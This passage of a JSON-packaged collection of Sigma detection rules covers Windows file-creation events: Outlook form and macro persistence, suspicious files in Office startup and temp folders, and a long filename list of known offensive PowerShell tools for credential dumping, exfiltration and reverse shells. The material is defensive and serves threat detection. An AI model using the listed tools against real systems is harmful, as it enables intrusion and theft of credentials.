    "content": "title: Potential Persistence Via Outlook Form\nid: c3edc6a5-d9d4-48d8-930e-aab518390917\nstatus: test\ndescription: Detects the creation of a new Outlook form which can contain malicious code\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79\n    - https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form\n    - https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2021-06-10\nmodified: 2023-02-22\ntags:\n    - attack.persistence\n    - attack.t1137.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\outlook.exe'\n        TargetFilename|contains:\n            - '\\AppData\\Local\\Microsoft\\FORMS\\IPM'\n            - '\\Local Settings\\Application Data\\Microsoft\\Forms' # Windows XP\n    condition: selection\nfalsepositives:\n    - Legitimate use of outlook forms\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml",
    "content": "title: Suspicious File Created in Outlook Temporary Directory\nid: fabb0e80-030c-4e3e-a104-d09676991ac3\nrelated:\n    - id: f748c45a-f8d3-4e6f-b617-fe176f695b8f\n      type: obsolete\nstatus: experimental\ndescription: |\n    Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.\n    This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.\nreferences:\n    - https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/\n    - https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/\n    - https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/\nauthor: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-22\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_extension:\n        TargetFilename|endswith:\n            - '.cpl'\n            - '.hta'\n            - '.iso'\n            - '.rdp'\n            - '.svg'\n            - '.vba'\n            - '.vbe'\n            - '.vbs'\n    selection_location:\n        - TargetFilename|contains:\n              - '\\AppData\\Local\\Packages\\Microsoft.Outlook_'\n              - '\\AppData\\Local\\Microsoft\\Olk\\Attachments\\'\n        - TargetFilename|contains|all:\n              - '\\AppData\\Local\\Microsoft\\Windows\\'\n              - '\\Content.Outlook\\'\n    condition: all of selection_*\nfalsepositives:\n    - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml",
    "content": "title: Suspicious Outlook Macro Created\nid: 117d3d3a-755c-4a61-b23e-9171146d094c\nrelated:\n    - id: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61\n      type: derived\nstatus: test\ndescription: Detects the creation of a macro file for Outlook.\nreferences:\n    - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53\n    - https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1137\n    - attack.t1008\n    - attack.t1546\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\Microsoft\\Outlook\\VbaProject.OTM'\n    filter:\n        Image|endswith: '\\outlook.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml",
    "content": "title: Publisher Attachment File Dropped In Suspicious Location\nid: 3d2a2d59-929c-4b78-8c1a-145dfe9e07b1\nstatus: test\ndescription: Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents\nreferences:\n    - https://twitter.com/EmericNasi/status/1623224526220804098\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - 'C:\\Temp\\'\n        TargetFilename|endswith: '.pub'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of \".pub\" files from those locations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_startup_persistence.yml",
    "content": "title: Potential Persistence Via Microsoft Office Startup Folder\nid: 0e20c89d-2264-44ae-8238-aeeaba609ece\nstatus: test\ndescription: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.\nreferences:\n    - https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies\n    - https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders\nauthor: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-02\nmodified: 2023-06-22\ntags:\n    - attack.persistence\n    - attack.t1137\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_word_paths:\n        - TargetFilename|contains: '\\Microsoft\\Word\\STARTUP'\n        - TargetFilename|contains|all:\n              - '\\Office'\n              - '\\Program Files'\n              - '\\STARTUP'\n    selection_word_extension:\n        TargetFilename|endswith:\n            - '.doc'\n            - '.docm'\n            - '.docx'\n            - '.dot'\n            - '.dotm'\n            - '.rtf'\n    selection_excel_paths:\n        - TargetFilename|contains: '\\Microsoft\\Excel\\XLSTART'\n        - TargetFilename|contains|all:\n              - '\\Office'\n              - '\\Program Files'\n              - '\\XLSTART'\n    selection_excel_extension:\n        TargetFilename|endswith:\n            - '.xls'\n            - '.xlsm'\n            - '.xlsx'\n            - '.xlt'\n            - '.xltm'\n    filter_main_office:\n        Image|endswith:\n            - '\\WINWORD.exe'\n            - '\\EXCEL.exe'\n    condition: (all of selection_word_* or all of selection_excel_*) and not filter_main_office\nfalsepositives:\n    - Loading a user environment from a backup or a domain controller\n    - Synchronization of templates\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml",
    "content": "title: File With Uncommon Extension Created By An Office Application\nid: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\nstatus: test\ndescription: Detects the creation of files with an executable or script extension by an Office application.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-08-23\nmodified: 2025-10-17\ntags:\n    - attack.t1204.002\n    - attack.execution\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    # Note: Please add more file extensions to the logic of your choice.\n    selection1:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\powerpnt.exe'\n            - '\\visio.exe'\n            - '\\winword.exe'\n    selection2:\n        TargetFilename|endswith:\n            - '.bat'\n            - '.cmd'\n            - '.com'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.ocx'\n            - '.proj'\n            - '.ps1'\n            - '.scf'\n            - '.scr'\n            - '.sys'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n            - '.wsh'\n    filter_main_localassembly:\n        TargetFilename|contains: '\\AppData\\Local\\assembly\\tmp\\'\n        TargetFilename|endswith: '.dll'\n    filter_optional_webservicecache: # matches e.g. directory with name *.microsoft.com\n        TargetFilename|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\Office\\'\n            - '\\WebServiceCache\\AllUsers'\n        TargetFilename|endswith: '.com'\n    filter_optional_webex:\n        Image|endswith: '\\winword.exe'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\webexdelta\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    filter_optional_backstageinappnavcache: # matches e.g. C:\\Users\\xxxxx\\AppData\\Local\\Microsoft\\Office\\16.0\\BackstageInAppNavCache\\ODB-user@domain.com\n        TargetFilename|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\Office\\'\n            - '\\BackstageInAppNavCache\\'\n        TargetFilename|endswith: '.com'\n    condition: all of selection* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml",
    "content": "title: Uncommon File Created In Office Startup Folder\nid: a10a2c40-2c4d-49f8-b557-1a946bc55d9d\nstatus: test\ndescription: Detects the creation of a file with an uncommon extension in an Office application startup folder\nreferences:\n    - https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/\n    - http://addbalance.com/word/startup.htm\n    - https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3\n    - https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-05\nmodified: 2023-12-13\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_word_paths:\n        - TargetFilename|contains: '\\Microsoft\\Word\\STARTUP'\n        - TargetFilename|contains|all:\n              - '\\Office'\n              - '\\Program Files'\n              - '\\STARTUP'\n    filter_exclude_word_ext:\n        TargetFilename|endswith:\n            - '.docb' # Word binary document introduced in Microsoft Office 2007\n            - '.docm' # Word macro-enabled document; same as docx, but may contain macros and scripts\n            - '.docx' # Word document\n            - '.dotm' # Word macro-enabled template; same as dotx, but may contain macros and scripts\n            - '.mdb' # MS Access DB\n            - '.mdw' # MS Access DB\n            - '.pdf' # PDF documents\n            - '.wll' # Word add-in\n            - '.wwl' # Word add-in\n    selection_excel_paths:\n        - TargetFilename|contains: '\\Microsoft\\Excel\\XLSTART'\n        - TargetFilename|contains|all:\n              - '\\Office'\n              - '\\Program Files'\n              - '\\XLSTART'\n    filter_exclude_excel_ext:\n        TargetFilename|endswith:\n            - '.xll'\n            - '.xls'\n            - '.xlsm'\n            - '.xlsx'\n            - '.xlt'\n            - '.xltm'\n            - '.xlw'\n    filter_main_office_click_to_run:\n        Image|contains: ':\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_main_office_apps:\n        Image|contains:\n            - ':\\Program Files\\Microsoft Office\\'\n            - ':\\Program Files (x86)\\Microsoft Office\\'\n        Image|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n    condition: ((selection_word_paths and not filter_exclude_word_ext) or (selection_excel_paths and not filter_exclude_excel_ext)) and not 1 of filter_main_*\nfalsepositives:\n    - False positive might stem from rare extensions used by other Office utilities.\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml",
    "content": "title: PCRE.NET Package Temp Files\nid: 6e90ae7a-7cd3-473f-a035-4ebb72d961da\nstatus: test\ndescription: Detects processes creating temp files related to PCRE.NET package\nreferences:\n    - https://twitter.com/rbmaslen/status/1321859647091970051\n    - https://twitter.com/tifkin_/status/1321916444557365248\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-29\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: \\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml",
    "content": "title: Suspicious File Created In PerfLogs\nid: bbb7e38c-0b41-4a11-b306-d2a457b7ac2b\nstatus: test\ndescription: Detects suspicious file based on their extension being created in \"C:\\PerfLogs\\\". Note that this directory mostly contains \".etl\" files\nreferences:\n    - Internal Research\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\PerfLogs\\'\n        TargetFilename|endswith:\n            - '.7z'\n            - '.bat'\n            - '.bin'\n            - '.chm'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.lnk'\n            - '.ps1'\n            - '.psm1'\n            - '.py'\n            - '.scr'\n            - '.sys'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_drop_binary_or_script.yml",
    "content": "title: Potential Binary Or Script Dropper Via PowerShell\nid: 7047d730-036f-4f40-b9d8-1c63e36d5e62\nstatus: test\ndescription: Detects PowerShell creating a binary executable or a script file.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-17\nmodified: 2025-07-04\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n        TargetFilename|endswith:\n            - '.bat'\n            - '.chm'\n            - '.cmd'\n            - '.com'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.jar'\n            - '.js'\n            - '.ocx'\n            - '.scr'\n            - '.sys'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    filter_main_user_temp:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    filter_main_other_temp:\n        # Example: C:\\Windows\\Temp\\0DA9758B-4649-4969-9409-5CBDF193FB53\\TransmogProvider.dll\n        TargetFilename|startswith:\n            - 'C:\\Windows\\Temp\\'\n            - 'C:\\Windows\\SystemTemp\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    filter_main_powershell_module:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\WindowsPowerShell\\Modules\\' # C:\\Users\\xxxx\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.12\\lib\\net47\\PowerShellYamlSerializer.dll\n        TargetFilename|endswith: '.dll'\n    filter_main_nuget:\n        TargetFilename|startswith: 'C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\'\n        TargetFilename|endswith: '\\Microsoft.PackageManagement.NuGetProvider.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_drop_powershell.yml",
    "content": "title: PowerShell Script Dropped Via PowerShell.EXE\nid: 576426ad-0131-4001-ae01-be175da0c108\nstatus: test\ndescription: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: frack113\ndate: 2023-05-09\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|endswith: '.ps1'\n    filter_main_psscriptpolicytest:\n        TargetFilename|contains: '__PSScriptPolicyTest_'\n    filter_main_appdata:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n    filter_main_windows_temp:\n        TargetFilename|startswith: 'C:\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml",
    "content": "title: Malicious PowerShell Scripts - FileCreation\nid: f331aa1f-8c53-4fc3-b083-cc159bc971cb\nrelated:\n    - id: 41025fd7-0466-4650-a813-574aaacbe7f4\n      type: similar\nstatus: test\ndescription: Detects the creation of known offensive powershell scripts used for exploitation\nreferences:\n    - https://github.com/PowerShellMafia/PowerSploit\n    - https://github.com/NetSPI/PowerUpSQL\n    - https://github.com/CsEnox/EventViewer-UACBypass\n    - https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu\n    - https://github.com/nettitude/Invoke-PowerThIEf\n    - https://github.com/S3cur3Th1sSh1t/WinPwn\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/Kevin-Robertson/Powermad\n    - https://github.com/adrecon/ADRecon\n    - https://github.com/adrecon/AzureADRecon\n    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein\ndate: 2018-04-07\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_generic:\n        TargetFilename|endswith:\n            # Note: Please ensure alphabetical order when adding new entries\n            - '\\Add-ConstrainedDelegationBackdoor.ps1'\n            - '\\Add-Exfiltration.ps1'\n            - '\\Add-Persistence.ps1'\n            - '\\Add-RegBackdoor.ps1'\n            - '\\Add-RemoteRegBackdoor.ps1'\n            - '\\Add-ScrnSaveBackdoor.ps1'\n            - '\\ADRecon.ps1'\n            - '\\AzureADRecon.ps1'\n            - '\\BadSuccessor.ps1'\n            - '\\Check-VM.ps1'\n            - '\\ConvertTo-ROT13.ps1'\n            - '\\Copy-VSS.ps1'\n            - '\\Create-MultipleSessions.ps1'\n            - '\\DNS_TXT_Pwnage.ps1'\n            - '\\dnscat2.ps1'\n            - '\\Do-Exfiltration.ps1'\n            - '\\DomainPasswordSpray.ps1'\n            - '\\Download_Execute.ps1'\n            - '\\Download-Execute-PS.ps1'\n            - '\\Enable-DuplicateToken.ps1'\n            - '\\Enabled-DuplicateToken.ps1'\n            - '\\Execute-Command-MSSQL.ps1'\n            - '\\Execute-DNSTXT-Code.ps1'\n            - '\\Execute-OnTime.ps1'\n            - '\\ExetoText.ps1'\n            - '\\Exploit-Jboss.ps1'\n            - '\\Find-AVSignature.ps1'\n            - '\\Find-Fruit.ps1'\n            - '\\Find-GPOLocation.ps1'\n            - '\\Find-TrustedDocuments.ps1'\n            - '\\FireBuster.ps1'\n            - '\\FireListener.ps1'\n            - '\\Get-ApplicationHost.ps1'\n            - '\\Get-ChromeDump.ps1'\n            - '\\Get-ClipboardContents.ps1'\n            - '\\Get-ComputerDetail.ps1'\n            - '\\Get-FoxDump.ps1'\n            - '\\Get-GPPAutologon.ps1'\n            - '\\Get-GPPPassword.ps1'\n            - '\\Get-IndexedItem.ps1'\n            - '\\Get-Keystrokes.ps1'\n            - '\\Get-LSASecret.ps1'\n            - '\\Get-MicrophoneAudio.ps1'\n            - '\\Get-PassHashes.ps1'\n            - '\\Get-PassHints.ps1'\n            - '\\Get-RegAlwaysInstallElevated.ps1'\n            - '\\Get-RegAutoLogon.ps1'\n            - '\\Get-RickAstley.ps1'\n            - '\\Get-Screenshot.ps1'\n            - '\\Get-SecurityPackages.ps1'\n            - '\\Get-ServiceFilePermission.ps1'\n            - '\\Get-ServicePermission.ps1'\n            - '\\Get-ServiceUnquoted.ps1'\n            - '\\Get-SiteListPassword.ps1'\n            - '\\Get-System.ps1'\n            - '\\Get-TimedScreenshot.ps1'\n            - '\\Get-UnattendedInstallFile.ps1'\n            - '\\Get-Unconstrained.ps1'\n            - '\\Get-USBKeystrokes.ps1'\n            - '\\Get-VaultCredential.ps1'\n            - '\\Get-VulnAutoRun.ps1'\n            - '\\Get-VulnSchTask.ps1'\n            - '\\Get-WebConfig.ps1'\n            - '\\Get-WebCredentials.ps1'\n            - '\\Get-WLAN-Keys.ps1'\n            - '\\Gupt-Backdoor.ps1'\n            - '\\HTTP-Backdoor.ps1'\n            - '\\HTTP-Login.ps1'\n            - '\\Install-ServiceBinary.ps1'\n            - '\\Install-SSP.ps1'\n            - '\\Invoke-ACLScanner.ps1'\n            - '\\Invoke-ADSBackdoor.ps1'\n            - '\\Invoke-AmsiBypass.ps1'\n            - '\\Invoke-ARPScan.ps1'\n            - '\\Invoke-BackdoorLNK.ps1'\n            - '\\Invoke-BadPotato.ps1'\n            - '\\Invoke-BetterSafetyKatz.ps1'\n            - '\\Invoke-BruteForce.ps1'\n            - '\\Invoke-BypassUAC.ps1'\n            - '\\Invoke-Carbuncle.ps1'\n            - '\\Invoke-Certify.ps1'\n            - '\\Invoke-ConPtyShell.ps1'\n            - '\\Invoke-CredentialInjection.ps1'\n            - '\\Invoke-CredentialsPhish.ps1'\n            - '\\Invoke-DAFT.ps1'\n            - '\\Invoke-DCSync.ps1'\n            - '\\Invoke-Decode.ps1'\n            - '\\Invoke-DinvokeKatz.ps1'\n            - '\\Invoke-DllInjection.ps1'\n            - '\\Invoke-DNSExfiltrator.ps1'\n            - '\\Invoke-DNSUpdate.ps1'\n            - '\\Invoke-DowngradeAccount.ps1'\n            - '\\Invoke-EgressCheck.ps1'\n            - '\\Invoke-Encode.ps1'\n            - '\\Invoke-EventViewer.ps1'\n            - '\\Invoke-Eyewitness.ps1'\n            - '\\Invoke-FakeLogonScreen.ps1'\n            - '\\Invoke-Farmer.ps1'\n            - '\\Invoke-Get-RBCD-Threaded.ps1'\n            - '\\Invoke-Gopher.ps1'\n            - '\\Invoke-Grouper2.ps1'\n            - '\\Invoke-Grouper3.ps1'\n            - '\\Invoke-HandleKatz.ps1'\n            - '\\Invoke-Interceptor.ps1'\n            - '\\Invoke-Internalmonologue.ps1'\n            - '\\Invoke-Inveigh.ps1'\n            - '\\Invoke-InveighRelay.ps1'\n            - '\\Invoke-JSRatRegsvr.ps1'\n            - '\\Invoke-JSRatRundll.ps1'\n            - '\\Invoke-KrbRelay.ps1'\n            - '\\Invoke-KrbRelayUp.ps1'\n            - '\\Invoke-LdapSignCheck.ps1'\n            - '\\Invoke-Lockless.ps1'\n            - '\\Invoke-MalSCCM.ps1'\n            - '\\Invoke-Mimikatz.ps1'\n            - '\\Invoke-MimikatzWDigestDowngrade.ps1'\n            - '\\Invoke-Mimikittenz.ps1'\n            - '\\Invoke-MITM6.ps1'\n            - '\\Invoke-NanoDump.ps1'\n            - '\\Invoke-NetRipper.ps1'\n            - '\\Invoke-NetworkRelay.ps1'\n            - '\\Invoke-NinjaCopy.ps1'\n            - '\\Invoke-OxidResolver.ps1'\n            - '\\Invoke-P0wnedshell.ps1'\n            - '\\Invoke-P0wnedshellx86.ps1'\n            - '\\Invoke-Paranoia.ps1'\n            - '\\Invoke-PortScan.ps1'\n            - '\\Invoke-PoshRatHttp.ps1'\n            - '\\Invoke-PoshRatHttps.ps1'\n            - '\\Invoke-PostExfil.ps1'\n            - '\\Invoke-PowerDump.ps1'\n            - '\\Invoke-PowerDPAPI.ps1'\n            - '\\Invoke-PowerShellIcmp.ps1'\n            - '\\Invoke-PowerShellTCP.ps1'\n            - '\\Invoke-PowerShellTcpOneLine.ps1'\n            - '\\Invoke-PowerShellTcpOneLineBind.ps1'\n            - '\\Invoke-PowerShellUdp.ps1'\n            - '\\Invoke-PowerShellUdpOneLine.ps1'\n            - '\\Invoke-PowerShellWMI.ps1'\n            - '\\Invoke-PowerThIEf.ps1'\n            - '\\Invoke-PPLDump.ps1'\n            - '\\Invoke-Prasadhak.ps1'\n            - '\\Invoke-PsExec.ps1'\n            - '\\Invoke-PsGcat.ps1'\n            - '\\Invoke-PsGcatAgent.ps1'\n            - '\\Invoke-PSInject.ps1'\n            - '\\Invoke-PsUaCme.ps1'\n            - '\\Invoke-ReflectivePEInjection.ps1'\n            - '\\Invoke-ReverseDNSLookup.ps1'\n            - '\\Invoke-Rubeus.ps1'\n            - '\\Invoke-RunAs.ps1'\n            - '\\Invoke-SafetyKatz.ps1'\n            - '\\Invoke-SauronEye.ps1'\n            - '\\Invoke-SCShell.ps1'\n            - '\\Invoke-Seatbelt.ps1'\n            - '\\Invoke-ServiceAbuse.ps1'\n            - '\\Invoke-SessionGopher.ps1'\n            - '\\Invoke-ShellCode.ps1'\n            - '\\Invoke-SMBScanner.ps1'\n            - '\\Invoke-Snaffler.ps1'\n            - '\\Invoke-Spoolsample.ps1'\n            - '\\Invoke-SSHCommand.ps1'\n            - '\\Invoke-SSIDExfil.ps1'\n            - '\\Invoke-StandIn.ps1'\n            - '\\Invoke-StickyNotesExtract.ps1'\n            - '\\Invoke-Tater.ps1'\n            - '\\Invoke-Thunderfox.ps1'\n            - '\\Invoke-ThunderStruck.ps1'\n            - '\\Invoke-TokenManipulation.ps1'\n            - '\\Invoke-Tokenvator.ps1'\n            - '\\Invoke-TotalExec.ps1'\n            - '\\Invoke-UrbanBishop.ps1'\n            - '\\Invoke-UserHunter.ps1'\n            - '\\Invoke-VoiceTroll.ps1'\n            - '\\Invoke-Whisker.ps1'\n            - '\\Invoke-WinEnum.ps1'\n            - '\\Invoke-winPEAS.ps1'\n            - '\\Invoke-WireTap.ps1'\n            - '\\Invoke-WmiCommand.ps1'\n            - '\\Invoke-WScriptBypassUAC.ps1'\n            - '\\Invoke-Zerologon.ps1'\n            - '\\Keylogger.ps1'\n            - '\\MailRaider.ps1'\n            - '\\New-HoneyHash.ps1'\n            - '\\OfficeMemScraper.ps1'\n            - '\\Offline_Winpwn.ps1'\n            - '\\Out-CHM.ps1'\n            - '\\Out-DnsTxt.ps1'\n            - '\\Out-Excel.ps1'\n            - '\\Out-HTA.ps1'\n            - '\\Out-Java.ps1'\n            - '\\Out-JS.ps1'\n            - '\\Out-Minidump.ps1'\n            - '\\Out-RundllCommand.ps1'\n            - '\\Out-SCF.ps1'\n            - '\\Out-SCT.ps1'\n            - '\\Out-Shortcut.ps1'\n            - '\\Out-WebQuery.ps1'\n            - '\\Out-Word.ps1'\n            - '\\Parse_Keys.ps1'\n            - '\\Port-Scan.ps1'\n            - '\\PowerBreach.ps1'\n            - '\\powercat.ps1'\n            - '\\Powermad.ps1'\n            - '\\PowerRunAsSystem.psm1'\n            - '\\PowerSharpPack.ps1'\n            - '\\PowerUp.ps1'\n            - '\\PowerUpSQL.ps1'\n            - '\\PowerView.ps1'\n            - '\\PSAsyncShell.ps1'\n            - '\\RemoteHashRetrieval.ps1'\n            - '\\Remove-Persistence.ps1'\n            - '\\Remove-PoshRat.ps1'\n            - '\\Remove-Update.ps1'\n            - '\\Run-EXEonRemote.ps1'\n            - '\\Schtasks-Backdoor.ps1'\n            - '\\Set-DCShadowPermissions.ps1'\n            - '\\Set-MacAttribute.ps1'\n            - '\\Set-RemotePSRemoting.ps1'\n            - '\\Set-RemoteWMI.ps1'\n            - '\\Set-Wallpaper.ps1'\n            - '\\Show-TargetScreen.ps1'\n            - '\\Speak.ps1'\n            - '\\Start-CaptureServer.ps1'\n            - '\\Start-WebcamRecorder.ps1'\n            - '\\StringToBase64.ps1'\n            - '\\TexttoExe.ps1'\n            - '\\Veeam-Get-Creds.ps1'\n            - '\\VolumeShadowCopyTools.ps1'\n            - '\\WinPwn.ps1'\n            - '\\WSUSpendu.ps1'\n    selection_invoke_sharp:\n        TargetFilename|contains: 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n        TargetFilename|endswith: '.ps1'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_module_creation.yml",
